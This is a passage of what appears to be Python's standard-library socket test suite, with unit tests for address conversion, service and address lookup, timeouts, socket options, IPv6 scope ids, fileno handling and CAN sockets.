socket.ntohs(k)
socket.htons(k)
for k in l_good_values:
socket.ntohl(k)
socket.htonl(k)
for k in s_bad_values:
self.assertRaises(OverflowError, socket.ntohs, k)
self.assertRaises(OverflowError, socket.htons, k)
for k in l_bad_values:
self.assertRaises(OverflowError, socket.ntohl, k)
self.assertRaises(OverflowError, socket.htonl, k)
for k in s_deprecated_values:
self.assertWarns(DeprecationWarning, socket.ntohs, k)
self.assertWarns(DeprecationWarning, socket.htons, k)
def testGetServBy(self):
eq = self.assertEqual
# Find one service that exists, then check all the related interfaces.
# I've ordered this by protocols that have both a tcp and udp
# protocol, at least for modern Linuxes.
if (sys.platform.startswith(('freebsd', 'netbsd', 'gnukfreebsd'))
or sys.platform in ('linux', 'darwin')):
# avoid the 'echo' service on this platform, as there is an
# assumption breaking non-standard port/protocol entry
services = ('daytime', 'qotd', 'domain')
else:
services = ('echo', 'daytime', 'domain')
for service in services:
try:
port = socket.getservbyname(service, 'tcp')
break
except OSError:
pass
else:
raise OSError
# Try same call with optional protocol omitted
# Issue #26936: Android getservbyname() was broken before API 23.
if (not hasattr(sys, 'getandroidapilevel') or
sys.getandroidapilevel() >= 23):
port2 = socket.getservbyname(service)
eq(port, port2)
# Try udp, but don't barf if it doesn't exist
try:
udpport = socket.getservbyname(service, 'udp')
except OSError:
udpport = None
else:
eq(udpport, port)
# Now make sure the lookup by port returns the same service name
# Issue #26936: Android getservbyport() is broken.
if not support.is_android:
eq(socket.getservbyport(port2), service)
eq(socket.getservbyport(port, 'tcp'), service)
if udpport is not None:
eq(socket.getservbyport(udpport, 'udp'), service)
# Make sure getservbyport does not accept out of range ports.
self.assertRaises(OverflowError, socket.getservbyport, -1)
self.assertRaises(OverflowError, socket.getservbyport, 65536)
def testDefaultTimeout(self):
# Testing default timeout
# The default timeout should initially be None
self.assertEqual(socket.getdefaulttimeout(), None)
s = socket.socket()
self.assertEqual(s.gettimeout(), None)
s.close()
# Set the default timeout to 10, and see if it propagates
socket.setdefaulttimeout(10)
self.assertEqual(socket.getdefaulttimeout(), 10)
s = socket.socket()
self.assertEqual(s.gettimeout(), 10)
s.close()
# Reset the default timeout to None, and see if it propagates
socket.setdefaulttimeout(None)
self.assertEqual(socket.getdefaulttimeout(), None)
s = socket.socket()
self.assertEqual(s.gettimeout(), None)
s.close()
# Check that setting it to an invalid value raises ValueError
self.assertRaises(ValueError, socket.setdefaulttimeout, -1)
# Check that setting it to an invalid type raises TypeError
self.assertRaises(TypeError, socket.setdefaulttimeout, "spam")
@unittest.skipUnless(hasattr(socket, 'inet_aton'),
'test needs socket.inet_aton()')
def testIPv4_inet_aton_fourbytes(self):
# Test that issue1008086 and issue767150 are fixed.
# It must return 4 bytes.
self.assertEqual(b'\x00'*4, socket.inet_aton('0.0.0.0'))
self.assertEqual(b'\xff'*4, socket.inet_aton('255.255.255.255'))
@unittest.skipUnless(hasattr(socket, 'inet_pton'),
'test needs socket.inet_pton()')
def testIPv4toString(self):
from socket import inet_aton as f, inet_pton, AF_INET
g = lambda a: inet_pton(AF_INET, a)
assertInvalid = lambda func,a: self.assertRaises(
(OSError, ValueError), func, a
)
self.assertEqual(b'\x00\x00\x00\x00', f('0.0.0.0'))
self.assertEqual(b'\xff\x00\xff\x00', f('255.0.255.0'))
self.assertEqual(b'\xaa\xaa\xaa\xaa', f('170.170.170.170'))
self.assertEqual(b'\x01\x02\x03\x04', f('1.2.3.4'))
self.assertEqual(b'\xff\xff\xff\xff', f('255.255.255.255'))
# bpo-29972: inet_pton() doesn't fail on AIX
if not sys.platform.startswith('aix'):
assertInvalid(f, '0.0.0.')
assertInvalid(f, '300.0.0.0')
assertInvalid(f, 'a.0.0.0')
assertInvalid(f, '1.2.3.4.5')
assertInvalid(f, '::1')
self.assertEqual(b'\x00\x00\x00\x00', g('0.0.0.0'))
self.assertEqual(b'\xff\x00\xff\x00', g('255.0.255.0'))
self.assertEqual(b'\xaa\xaa\xaa\xaa', g('170.170.170.170'))
self.assertEqual(b'\xff\xff\xff\xff', g('255.255.255.255'))
assertInvalid(g, '0.0.0.')
assertInvalid(g, '300.0.0.0')
assertInvalid(g, 'a.0.0.0')
assertInvalid(g, '1.2.3.4.5')
assertInvalid(g, '::1')
@unittest.skipUnless(hasattr(socket, 'inet_pton'),
'test needs socket.inet_pton()')
def testIPv6toString(self):
try:
from socket import inet_pton, AF_INET6, has_ipv6
if not has_ipv6:
self.skipTest('IPv6 not available')
except ImportError:
self.skipTest('could not import needed symbols from socket')
if sys.platform == "win32":
try:
inet_pton(AF_INET6, '::')
except OSError as e:
if e.winerror == 10022:
self.skipTest('IPv6 might not be supported')
f = lambda a: inet_pton(AF_INET6, a)
assertInvalid = lambda a: self.assertRaises(
(OSError, ValueError), f, a
)
self.assertEqual(b'\x00' * 16, f('::'))
self.assertEqual(b'\x00' * 16, f('0::0'))
self.assertEqual(b'\x00\x01' + b'\x00' * 14, f('1::'))
self.assertEqual(
b'\x45\xef\x76\xcb\x00\x1a\x56\xef\xaf\xeb\x0b\xac\x19\x24\xae\xae',
f('45ef:76cb:1a:56ef:afeb:bac:1924:aeae')
)
self.assertEqual(
b'\xad\x42\x0a\xbc' + b'\x00' * 4 + b'\x01\x27\x00\x00\x02\x54\x00\x02',
f('ad42:abc::127:0:254:2')
)
self.assertEqual(b'\x00\x12\x00\x0a' + b'\x00' * 12, f('12:a::'))
assertInvalid('0x20::')
assertInvalid(':::')
assertInvalid('::0::')
assertInvalid('1::abc::')
assertInvalid('1::abc::def')
assertInvalid('1:2:3:4:5:6')
assertInvalid('1:2:3:4:5:6:7:8:0')
# bpo-29972: inet_pton() doesn't fail on AIX
if not sys.platform.startswith('aix'):
assertInvalid('1:2:3:4:5:6:')
assertInvalid('1:2:3:4:5:6:7:8:')
self.assertEqual(b'\x00' * 12 + b'\xfe\x2a\x17\x40',
f('::254.42.23.64')
)
self.assertEqual(
b'\x00\x42' + b'\x00' * 8 + b'\xa2\x9b\xfe\x2a\x17\x40',
f('42::a29b:254.42.23.64')
)
self.assertEqual(
b'\x00\x42\xa8\xb9\x00\x00\x00\x02\xff\xff\xa2\x9b\xfe\x2a\x17\x40',
f('42:a8b9:0:2:ffff:a29b:254.42.23.64')
)
assertInvalid('255.254.253.252')
assertInvalid('1::260.2.3.0')
assertInvalid('1::0.be.e.0')
assertInvalid('1:2:3:4:5:6:7:1.2.3.4')
assertInvalid('::1.2.3.4:0')
assertInvalid('0.100.200.0:3:4:5:6:7:8')
@unittest.skipUnless(hasattr(socket, 'inet_ntop'),
'test needs socket.inet_ntop()')
def testStringToIPv4(self):
from socket import inet_ntoa as f, inet_ntop, AF_INET
g = lambda a: inet_ntop(AF_INET, a)
assertInvalid = lambda func,a: self.assertRaises(
(OSError, ValueError), func, a
)
self.assertEqual('1.0.1.0', f(b'\x01\x00\x01\x00'))
self.assertEqual('170.85.170.85', f(b'\xaa\x55\xaa\x55'))
self.assertEqual('255.255.255.255', f(b'\xff\xff\xff\xff'))
self.assertEqual('1.2.3.4', f(b'\x01\x02\x03\x04'))
assertInvalid(f, b'\x00' * 3)
assertInvalid(f, b'\x00' * 5)
assertInvalid(f, b'\x00' * 16)
self.assertEqual('170.85.170.85', f(bytearray(b'\xaa\x55\xaa\x55')))
self.assertEqual('1.0.1.0', g(b'\x01\x00\x01\x00'))
self.assertEqual('170.85.170.85', g(b'\xaa\x55\xaa\x55'))
self.assertEqual('255.255.255.255', g(b'\xff\xff\xff\xff'))
assertInvalid(g, b'\x00' * 3)
assertInvalid(g, b'\x00' * 5)
assertInvalid(g, b'\x00' * 16)
self.assertEqual('170.85.170.85', g(bytearray(b'\xaa\x55\xaa\x55')))
@unittest.skipUnless(hasattr(socket, 'inet_ntop'),
'test needs socket.inet_ntop()')
def testStringToIPv6(self):
try:
from socket import inet_ntop, AF_INET6, has_ipv6
if not has_ipv6:
self.skipTest('IPv6 not available')
except ImportError:
self.skipTest('could not import needed symbols from socket')
if sys.platform == "win32":
try:
inet_ntop(AF_INET6, b'\x00' * 16)
except OSError as e:
if e.winerror == 10022:
self.skipTest('IPv6 might not be supported')
f = lambda a: inet_ntop(AF_INET6, a)
assertInvalid = lambda a: self.assertRaises(
(OSError, ValueError), f, a
)
self.assertEqual('::', f(b'\x00' * 16))
self.assertEqual('::1', f(b'\x00' * 15 + b'\x01'))
self.assertEqual(
'aef:b01:506:1001:ffff:9997:55:170',
f(b'\x0a\xef\x0b\x01\x05\x06\x10\x01\xff\xff\x99\x97\x00\x55\x01\x70')
)
self.assertEqual('::1', f(bytearray(b'\x00' * 15 + b'\x01')))
assertInvalid(b'\x12' * 15)
assertInvalid(b'\x12' * 17)
assertInvalid(b'\x12' * 4)
# XXX The following don't test module-level functionality...
def testSockName(self):
# Testing getsockname()
port = support.find_unused_port()
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.addCleanup(sock.close)
sock.bind(("0.0.0.0", port))
name = sock.getsockname()
# XXX(nnorwitz): http://tinyurl.com/os5jz seems to indicate
# it is reasonable to get the host's addr in addition to 0.0.0.0.
# At least for eCos. This is required for the S/390 to pass.
try:
my_ip_addr = socket.gethostbyname(socket.gethostname())
except OSError:
# Probably name lookup wasn't set up right; skip this test
self.skipTest('name lookup failure')
self.assertIn(name[0], ("0.0.0.0", my_ip_addr), '%s invalid' % name[0])
self.assertEqual(name[1], port)
def testGetSockOpt(self):
# Testing getsockopt()
# A freshly created socket should start with SO_REUSEADDR off (reuse == 0)
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.addCleanup(sock.close)
reuse = sock.getsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR)
self.assertFalse(reuse != 0, "initial mode is reuse")
def testSetSockOpt(self):
# Testing setsockopt()
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.addCleanup(sock.close)
sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
reuse = sock.getsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR)
self.assertFalse(reuse == 0, "failed to set reuse mode")
def testSendAfterClose(self):
# testing send() after close() with timeout
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.settimeout(1)
sock.close()
self.assertRaises(OSError, sock.send, b"spam")
def testCloseException(self):
sock = socket.socket()
sock.bind((socket._LOCALHOST, 0))
socket.socket(fileno=sock.fileno()).close()
try:
sock.close()
except OSError as err:
# Winsock apparently raises ENOTSOCK
self.assertIn(err.errno, (errno.EBADF, errno.ENOTSOCK))
else:
self.fail("close() should raise EBADF/ENOTSOCK")
def testNewAttributes(self):
# testing .family, .type and .protocol
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.assertEqual(sock.family, socket.AF_INET)
if hasattr(socket, 'SOCK_CLOEXEC'):
self.assertIn(sock.type,
(socket.SOCK_STREAM | socket.SOCK_CLOEXEC,
socket.SOCK_STREAM))
else:
self.assertEqual(sock.type, socket.SOCK_STREAM)
self.assertEqual(sock.proto, 0)
sock.close()
def test_getsockaddrarg(self):
sock = socket.socket()
self.addCleanup(sock.close)
port = support.find_unused_port()
big_port = port + 65536
neg_port = port - 65536
self.assertRaises(OverflowError, sock.bind, (HOST, big_port))
self.assertRaises(OverflowError, sock.bind, (HOST, neg_port))
# Since find_unused_port() is inherently subject to race conditions, we
# call it a couple times if necessary.
for i in itertools.count():
port = support.find_unused_port()
try:
sock.bind((HOST, port))
except OSError as e:
if e.errno != errno.EADDRINUSE or i == 5:
raise
else:
break
@unittest.skipUnless(os.name == "nt", "Windows specific")
def test_sock_ioctl(self):
self.assertTrue(hasattr(socket.socket, 'ioctl'))
self.assertTrue(hasattr(socket, 'SIO_RCVALL'))
self.assertTrue(hasattr(socket, 'RCVALL_ON'))
self.assertTrue(hasattr(socket, 'RCVALL_OFF'))
self.assertTrue(hasattr(socket, 'SIO_KEEPALIVE_VALS'))
s = socket.socket()
self.addCleanup(s.close)
self.assertRaises(ValueError, s.ioctl, -1, None)
s.ioctl(socket.SIO_KEEPALIVE_VALS, (1, 100, 100))
@unittest.skipUnless(os.name == "nt", "Windows specific")
@unittest.skipUnless(hasattr(socket, 'SIO_LOOPBACK_FAST_PATH'),
'Loopback fast path support required for this test')
def test_sio_loopback_fast_path(self):
s = socket.socket()
self.addCleanup(s.close)
try:
s.ioctl(socket.SIO_LOOPBACK_FAST_PATH, True)
except OSError as exc:
WSAEOPNOTSUPP = 10045
if exc.winerror == WSAEOPNOTSUPP:
self.skipTest("SIO_LOOPBACK_FAST_PATH is defined but "
"doesn't implemented in this Windows version")
raise
self.assertRaises(TypeError, s.ioctl, socket.SIO_LOOPBACK_FAST_PATH, None)
def testGetaddrinfo(self):
try:
socket.getaddrinfo('localhost', 80)
except socket.gaierror as err:
if err.errno == socket.EAI_SERVICE:
# see http://bugs.python.org/issue1282647
self.skipTest("buggy libc version")
raise
# len of every sequence is supposed to be == 5
for info in socket.getaddrinfo(HOST, None):
self.assertEqual(len(info), 5)
# host can be a domain name, a string representation of an
# IPv4/v6 address or None
socket.getaddrinfo('localhost', 80)
socket.getaddrinfo('127.0.0.1', 80)
socket.getaddrinfo(None, 80)
if support.IPV6_ENABLED:
socket.getaddrinfo('::1', 80)
# port can be a string service name such as "http", a numeric
# port number or None
# Issue #26936: Android getaddrinfo() was broken before API level 23.
if (not hasattr(sys, 'getandroidapilevel') or
sys.getandroidapilevel() >= 23):
socket.getaddrinfo(HOST, "http")
socket.getaddrinfo(HOST, 80)
socket.getaddrinfo(HOST, None)
# test family and socktype filters
infos = socket.getaddrinfo(HOST, 80, socket.AF_INET, socket.SOCK_STREAM)
for family, type, _, _, _ in infos:
self.assertEqual(family, socket.AF_INET)
self.assertEqual(str(family), 'AddressFamily.AF_INET')
self.assertEqual(type, socket.SOCK_STREAM)
self.assertEqual(str(type), 'SocketKind.SOCK_STREAM')
infos = socket.getaddrinfo(HOST, None, 0, socket.SOCK_STREAM)
for _, socktype, _, _, _ in infos:
self.assertEqual(socktype, socket.SOCK_STREAM)
# test proto and flags arguments
socket.getaddrinfo(HOST, None, 0, 0, socket.SOL_TCP)
socket.getaddrinfo(HOST, None, 0, 0, 0, socket.AI_PASSIVE)
# a server willing to support both IPv4 and IPv6 will
# usually do this
socket.getaddrinfo(None, 0, socket.AF_UNSPEC, socket.SOCK_STREAM, 0,
socket.AI_PASSIVE)
# test keyword arguments
a = socket.getaddrinfo(HOST, None)
b = socket.getaddrinfo(host=HOST, port=None)
self.assertEqual(a, b)
a = socket.getaddrinfo(HOST, None, socket.AF_INET)
b = socket.getaddrinfo(HOST, None, family=socket.AF_INET)
self.assertEqual(a, b)
a = socket.getaddrinfo(HOST, None, 0, socket.SOCK_STREAM)
b = socket.getaddrinfo(HOST, None, type=socket.SOCK_STREAM)
self.assertEqual(a, b)
a = socket.getaddrinfo(HOST, None, 0, 0, socket.SOL_TCP)
b = socket.getaddrinfo(HOST, None, proto=socket.SOL_TCP)
self.assertEqual(a, b)
a = socket.getaddrinfo(HOST, None, 0, 0, 0, socket.AI_PASSIVE)
b = socket.getaddrinfo(HOST, None, flags=socket.AI_PASSIVE)
self.assertEqual(a, b)
a = socket.getaddrinfo(None, 0, socket.AF_UNSPEC, socket.SOCK_STREAM, 0,
socket.AI_PASSIVE)
b = socket.getaddrinfo(host=None, port=0, family=socket.AF_UNSPEC,
type=socket.SOCK_STREAM, proto=0,
flags=socket.AI_PASSIVE)
self.assertEqual(a, b)
# Issue #6697.
self.assertRaises(UnicodeEncodeError, socket.getaddrinfo, 'localhost', '\uD800')
# Issue 17269: test workaround for OS X platform bug segfault
if hasattr(socket, 'AI_NUMERICSERV'):
try:
# The arguments here are undefined and the call may succeed
# or fail. All we care here is that it doesn't segfault.
socket.getaddrinfo("localhost", None, 0, 0, 0,
socket.AI_NUMERICSERV)
except socket.gaierror:
pass
def test_getnameinfo(self):
# only IP addresses are allowed
self.assertRaises(OSError, socket.getnameinfo, ('mail.python.org',0), 0)
@unittest.skipUnless(support.is_resource_enabled('network'),
'network is not enabled')
def test_idna(self):
# Check for internet access before running test
# (issue #12804, issue #25138).
with support.transient_internet('python.org'):
socket.gethostbyname('python.org')
# these should all be successful
domain = 'испытание.pythontest.net'
socket.gethostbyname(domain)
socket.gethostbyname_ex(domain)
socket.getaddrinfo(domain,0,socket.AF_UNSPEC,socket.SOCK_STREAM)
# this may not work if the forward lookup chooses the IPv6 address, as that doesn't
# have a reverse entry yet
# socket.gethostbyaddr('испытание.python.org')
def check_sendall_interrupted(self, with_timeout):
# socketpair() is not strictly required, but it makes things easier.
if not hasattr(signal, 'alarm') or not hasattr(socket, 'socketpair'):
self.skipTest("signal.alarm and socket.socketpair required for this test")
# Our signal handlers clobber the C errno by calling a math function
# with an invalid domain value.
def ok_handler(*args):
self.assertRaises(ValueError, math.acosh, 0)
def raising_handler(*args):
self.assertRaises(ValueError, math.acosh, 0)
1 // 0
c, s = socket.socketpair()
old_alarm = signal.signal(signal.SIGALRM, raising_handler)
try:
if with_timeout:
# Just above the one second minimum for signal.alarm
c.settimeout(1.5)
with self.assertRaises(ZeroDivisionError):
signal.alarm(1)
c.sendall(b"x" * support.SOCK_MAX_SIZE)
if with_timeout:
signal.signal(signal.SIGALRM, ok_handler)
signal.alarm(1)
self.assertRaises(socket.timeout, c.sendall,
b"x" * support.SOCK_MAX_SIZE)
finally:
signal.alarm(0)
signal.signal(signal.SIGALRM, old_alarm)
c.close()
s.close()
def test_sendall_interrupted(self):
self.check_sendall_interrupted(False)
def test_sendall_interrupted_with_timeout(self):
self.check_sendall_interrupted(True)
def test_dealloc_warn(self):
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
r = repr(sock)
with self.assertWarns(ResourceWarning) as cm:
sock = None
support.gc_collect()
self.assertIn(r, str(cm.warning.args[0]))
# An open socket file object gets dereferenced after the socket
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
f = sock.makefile('rb')
r = repr(sock)
sock = None
support.gc_collect()
with self.assertWarns(ResourceWarning):
f = None
support.gc_collect()
def test_name_closed_socketio(self):
with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as sock:
fp = sock.makefile("rb")
fp.close()
self.assertEqual(repr(fp), "<_io.BufferedReader name=-1>")
def test_unusable_closed_socketio(self):
with socket.socket() as sock:
fp = sock.makefile("rb", buffering=0)
self.assertTrue(fp.readable())
self.assertFalse(fp.writable())
self.assertFalse(fp.seekable())
fp.close()
self.assertRaises(ValueError, fp.readable)
self.assertRaises(ValueError, fp.writable)
self.assertRaises(ValueError, fp.seekable)
def test_socket_close(self):
sock = socket.socket()
try:
sock.bind((HOST, 0))
socket.close(sock.fileno())
with self.assertRaises(OSError):
sock.listen(1)
finally:
with self.assertRaises(OSError):
# sock.close() fails with EBADF
sock.close()
with self.assertRaises(TypeError):
socket.close(None)
with self.assertRaises(OSError):
socket.close(-1)
def test_makefile_mode(self):
for mode in 'r', 'rb', 'rw', 'w', 'wb':
with self.subTest(mode=mode):
with socket.socket() as sock:
with sock.makefile(mode) as fp:
self.assertEqual(fp.mode, mode)
def test_makefile_invalid_mode(self):
for mode in 'rt', 'x', '+', 'a':
with self.subTest(mode=mode):
with socket.socket() as sock:
with self.assertRaisesRegex(ValueError, 'invalid mode'):
sock.makefile(mode)
def test_pickle(self):
sock = socket.socket()
with sock:
for protocol in range(pickle.HIGHEST_PROTOCOL + 1):
self.assertRaises(TypeError, pickle.dumps, sock, protocol)
for protocol in range(pickle.HIGHEST_PROTOCOL + 1):
family = pickle.loads(pickle.dumps(socket.AF_INET, protocol))
self.assertEqual(family, socket.AF_INET)
type = pickle.loads(pickle.dumps(socket.SOCK_STREAM, protocol))
self.assertEqual(type, socket.SOCK_STREAM)
def test_listen_backlog(self):
for backlog in 0, -1:
with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as srv:
srv.bind((HOST, 0))
srv.listen(backlog)
with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as srv:
srv.bind((HOST, 0))
srv.listen()
@support.cpython_only
def test_listen_backlog_overflow(self):
# Issue 15989
import _testcapi
srv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
srv.bind((HOST, 0))
self.assertRaises(OverflowError, srv.listen, _testcapi.INT_MAX + 1)
srv.close()
@unittest.skipUnless(support.IPV6_ENABLED, 'IPv6 required for this test.')
def test_flowinfo(self):
self.assertRaises(OverflowError, socket.getnameinfo,
(support.HOSTv6, 0, 0xffffffff), 0)
with socket.socket(socket.AF_INET6, socket.SOCK_STREAM) as s:
self.assertRaises(OverflowError, s.bind, (support.HOSTv6, 0, -10))
@unittest.skipUnless(support.IPV6_ENABLED, 'IPv6 required for this test.')
def test_getaddrinfo_ipv6_basic(self):
((*_, sockaddr),) = socket.getaddrinfo(
'ff02::1de:c0:face:8D', # Note capital letter `D`.
1234, socket.AF_INET6,
socket.SOCK_DGRAM,
socket.IPPROTO_UDP
)
self.assertEqual(sockaddr, ('ff02::1de:c0:face:8d', 1234, 0, 0))
@unittest.skipUnless(support.IPV6_ENABLED, 'IPv6 required for this test.')
@unittest.skipUnless(
hasattr(socket, 'if_nameindex'),
'if_nameindex is not supported')
def test_getaddrinfo_ipv6_scopeid_symbolic(self):
# Just pick up any network interface (Linux, Mac OS X)
(ifindex, test_interface) = socket.if_nameindex()[0]
((*_, sockaddr),) = socket.getaddrinfo(
'ff02::1de:c0:face:8D%' + test_interface,
1234, socket.AF_INET6,
socket.SOCK_DGRAM,
socket.IPPROTO_UDP
)
# Note missing interface name part in IPv6 address
self.assertEqual(sockaddr, ('ff02::1de:c0:face:8d', 1234, 0, ifindex))
@unittest.skipUnless(support.IPV6_ENABLED, 'IPv6 required for this test.')
@unittest.skipUnless(
sys.platform == 'win32',
        'Numeric scope id does not work or is undocumented')
def test_getaddrinfo_ipv6_scopeid_numeric(self):
# Also works on Linux and Mac OS X, but is not documented (?)
        # Windows, Linux and Mac OS X allow nonexistent interface numbers here.
ifindex = 42
((*_, sockaddr),) = socket.getaddrinfo(
'ff02::1de:c0:face:8D%' + str(ifindex),
1234, socket.AF_INET6,
socket.SOCK_DGRAM,
socket.IPPROTO_UDP
)
# Note missing interface name part in IPv6 address
self.assertEqual(sockaddr, ('ff02::1de:c0:face:8d', 1234, 0, ifindex))
@unittest.skipUnless(support.IPV6_ENABLED, 'IPv6 required for this test.')
@unittest.skipUnless(
hasattr(socket, 'if_nameindex'),
'if_nameindex is not supported')
def test_getnameinfo_ipv6_scopeid_symbolic(self):
# Just pick up any network interface.
(ifindex, test_interface) = socket.if_nameindex()[0]
sockaddr = ('ff02::1de:c0:face:8D', 1234, 0, ifindex) # Note capital letter `D`.
nameinfo = socket.getnameinfo(sockaddr, socket.NI_NUMERICHOST | socket.NI_NUMERICSERV)
self.assertEqual(nameinfo, ('ff02::1de:c0:face:8d%' + test_interface, '1234'))
@unittest.skipUnless(support.IPV6_ENABLED, 'IPv6 required for this test.')
@unittest.skipUnless(
sys.platform == 'win32',
        'Numeric scope id does not work or is undocumented')
def test_getnameinfo_ipv6_scopeid_numeric(self):
# Also works on Linux (undocumented), but does not work on Mac OS X
# Windows and Linux allow nonexistent interface numbers here.
ifindex = 42
sockaddr = ('ff02::1de:c0:face:8D', 1234, 0, ifindex) # Note capital letter `D`.
nameinfo = socket.getnameinfo(sockaddr, socket.NI_NUMERICHOST | socket.NI_NUMERICSERV)
self.assertEqual(nameinfo, ('ff02::1de:c0:face:8d%' + str(ifindex), '1234'))
def test_str_for_enums(self):
# Make sure that the AF_* and SOCK_* constants have enum-like string
# reprs.
with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
self.assertEqual(str(s.family), 'AddressFamily.AF_INET')
self.assertEqual(str(s.type), 'SocketKind.SOCK_STREAM')
def test_socket_consistent_sock_type(self):
SOCK_NONBLOCK = getattr(socket, 'SOCK_NONBLOCK', 0)
SOCK_CLOEXEC = getattr(socket, 'SOCK_CLOEXEC', 0)
sock_type = socket.SOCK_STREAM | SOCK_NONBLOCK | SOCK_CLOEXEC
with socket.socket(socket.AF_INET, sock_type) as s:
self.assertEqual(s.type, socket.SOCK_STREAM)
s.settimeout(1)
self.assertEqual(s.type, socket.SOCK_STREAM)
s.settimeout(0)
self.assertEqual(s.type, socket.SOCK_STREAM)
s.setblocking(True)
self.assertEqual(s.type, socket.SOCK_STREAM)
s.setblocking(False)
self.assertEqual(s.type, socket.SOCK_STREAM)
@unittest.skipIf(os.name == 'nt', 'Will not work on Windows')
def test_unknown_socket_family_repr(self):
# Test that when created with a family that's not one of the known
# AF_*/SOCK_* constants, socket.family just returns the number.
#
# To do this we fool socket.socket into believing it already has an
# open fd because on this path it doesn't actually verify the family and
# type and populates the socket object.
#
# On Windows this trick won't work, so the test is skipped.
fd, path = tempfile.mkstemp()
self.addCleanup(os.unlink, path)
unknown_family = max(socket.AddressFamily.__members__.values()) + 1
unknown_type = max(
kind
for name, kind in socket.SocketKind.__members__.items()
if name not in {'SOCK_NONBLOCK', 'SOCK_CLOEXEC'}
) + 1
with socket.socket(
family=unknown_family, type=unknown_type, proto=23,
fileno=fd) as s:
self.assertEqual(s.family, unknown_family)
self.assertEqual(s.type, unknown_type)
# some OS like macOS ignore proto
self.assertIn(s.proto, {0, 23})
@unittest.skipUnless(hasattr(os, 'sendfile'), 'test needs os.sendfile()')
def test__sendfile_use_sendfile(self):
class File:
def __init__(self, fd):
self.fd = fd
def fileno(self):
return self.fd
with socket.socket() as sock:
fd = os.open(os.curdir, os.O_RDONLY)
os.close(fd)
with self.assertRaises(socket._GiveupOnSendfile):
sock._sendfile_use_sendfile(File(fd))
with self.assertRaises(OverflowError):
sock._sendfile_use_sendfile(File(2**1000))
with self.assertRaises(TypeError):
sock._sendfile_use_sendfile(File(None))
def _test_socket_fileno(self, s, family, stype):
self.assertEqual(s.family, family)
self.assertEqual(s.type, stype)
fd = s.fileno()
s2 = socket.socket(fileno=fd)
self.addCleanup(s2.close)
# detach old fd to avoid double close
s.detach()
self.assertEqual(s2.family, family)
self.assertEqual(s2.type, stype)
self.assertEqual(s2.fileno(), fd)
def test_socket_fileno(self):
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.addCleanup(s.close)
s.bind((support.HOST, 0))
self._test_socket_fileno(s, socket.AF_INET, socket.SOCK_STREAM)
if hasattr(socket, "SOCK_DGRAM"):
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
self.addCleanup(s.close)
s.bind((support.HOST, 0))
self._test_socket_fileno(s, socket.AF_INET, socket.SOCK_DGRAM)
if support.IPV6_ENABLED:
s = socket.socket(socket.AF_INET6, socket.SOCK_STREAM)
self.addCleanup(s.close)
s.bind((support.HOSTv6, 0, 0, 0))
self._test_socket_fileno(s, socket.AF_INET6, socket.SOCK_STREAM)
if hasattr(socket, "AF_UNIX"):
tmpdir = tempfile.mkdtemp()
self.addCleanup(shutil.rmtree, tmpdir)
s = socket.socket(socket.AF_UNIX, socket.SOCK_STREAM)
self.addCleanup(s.close)
s.bind(os.path.join(tmpdir, 'socket'))
self._test_socket_fileno(s, socket.AF_UNIX, socket.SOCK_STREAM)
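# Illustrative sketch (not part of the test suite): the fileno round trip that
# _test_socket_fileno() above relies on. socket.socket(fileno=...) wraps an
# existing descriptor in a new socket object (it does not duplicate it), so the
# original wrapper is detach()ed to avoid closing the descriptor twice. This is
# a minimal, hedged example using only the standard socket API; the helper name
# is hypothetical.
def _example_rewrap_socket_fileno():
    import socket
    original = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    original.bind(("127.0.0.1", 0))  # bound first, as in test_socket_fileno()
    fd = original.fileno()
    # Family and type are auto-detected from the descriptor.
    rewrapped = socket.socket(fileno=fd)
    assert rewrapped.family == original.family
    assert rewrapped.type == original.type
    assert rewrapped.fileno() == fd
    # Detach the original wrapper so only one object owns the descriptor.
    original.detach()
    rewrapped.close()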
@unittest.skipUnless(HAVE_SOCKET_CAN, 'SocketCan required for this test.')
class BasicCANTest(unittest.TestCase):
def testCrucialConstants(self):
socket.AF_CAN
socket.PF_CAN
socket.CAN_RAW
@unittest.skipUnless(hasattr(socket, "CAN_BCM"),
'socket.CAN_BCM required for this test.')
def testBCMConstants(self):
socket.CAN_BCM
# opcodes
socket.CAN_BCM_TX_SETUP # create (cyclic) transmission task
socket.CAN_BCM_TX_DELETE # remove (cyclic) transmission task
socket.CAN_BCM_TX_READ # read properties of (cyclic) transmission task
socket.CAN_BCM_TX_SEND # send one CAN frame
socket.CAN_BCM_RX_SETUP # create RX content filter subscription
socket.CAN_BCM_RX_DELETE # remove RX content filter subscription
socket.CAN_BCM_RX_READ # read properties of RX content filter subscription
socket.CAN_BCM_TX_STATUS # reply to TX_READ request
socket.CAN_BCM_TX_EXPIRED # notification on performed transmissions (count=0)
socket.CAN_BCM_RX_STATUS # reply to RX_READ request
socket.CAN_BCM_RX_TIMEOUT # cyclic message is absent
socket.CAN_BCM_RX_CHANGED # updated CAN frame (detected content change)
def testCreateSocket(self):
with socket.socket(socket.PF_CAN, socket.SOCK_RAW, socket.CAN_RAW) as s:
pass
@unittest.skipUnless(hasattr(socket, "CAN_BCM"),
'socket.CAN_BCM required for this test.')
def testCreateBCMSocket(self):
with socket.socket(socket.PF_CAN, socket.SOCK_DGRAM, socket.CAN_BCM) as s:
pass
def testBindAny(self):
with socket.socket(socket.PF_CAN, socket.SOCK_RAW, socket.CAN_RAW) as s:
s.bind(('', ))
def testTooLongInterfaceName(self):
# most systems limit IFNAMSIZ to 16, take 1024 to be sure
with socket.socket(socket.PF_CAN, socket.SOCK_RAW, socket.CAN_RAW) as s:
self.assertRaisesRegex(OSError, 'interface name too long',
s.bind, ('x' * 1024,))
@unittest.skipUnless(hasattr(socket, "CAN_RAW_LOOPBACK"),
